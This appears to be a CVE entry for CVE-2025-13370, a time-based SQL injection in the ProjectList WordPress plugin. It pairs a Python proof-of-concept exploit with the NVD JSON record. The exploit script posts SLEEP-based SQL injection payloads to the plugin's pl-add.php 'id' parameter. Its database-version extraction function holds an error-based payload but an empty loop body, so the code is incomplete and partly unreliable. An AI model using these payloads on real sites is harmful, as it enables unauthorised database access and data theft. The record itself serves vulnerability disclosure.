CVE-2025-13370

import requests import time target_url = "http://target-wordpress-site/wp-content/plugins/projectlist/pages/pl-add.php" # Time-based blind SQL injection PoC def test_sqli(id_param): start_time = time.time() payload = f"{id_param} AND (SELECT 1 FROM (SELECT SLEEP(5))test)" data = {"id": payload} try: response = requests.post(target_url, data=data, timeout=10) elapsed = time.time() - start_time if elapsed >= 5: return True # SQL injection confirmed except requests.exceptions.Timeout: return True return False # Test for vulnerability if test_sqli("1"): print("[+] CVE-2025-13370 vulnerability confirmed!") print("[+] ProjectList plugin is vulnerable to time-based SQL injection") else: print("[-] Target may not be vulnerable or unreachable") # Example: Extract database version using blind injection def extract_db_version(): charset = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz@_." result = "" for pos in range(1, 50): for char in charset: payload = f"1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT MID(version(),{pos},1) FROM dual),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" # Implementation would require blind timing analysis pass return result

{"cve": {"id": "CVE-2025-13370", "sourceIdentifier": "[email protected]", "published": "2025-11-25T08:15:49.667", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ProjectList plugin for WordPress is vulnerable to time-based SQL Injection via the 'id' parameter in all versions up to, and including, 0.3.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://it.wordpress.org/plugins/projectlist/", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/projectlist/tags/0.3.0/pages/pl-add.php#L61", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/projectlist/trunk/pages/pl-add.php#L61", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e424d27b-f719-4fbf-b4eb-83b42130666c?source=cve", "source": "[email protected]"}]}}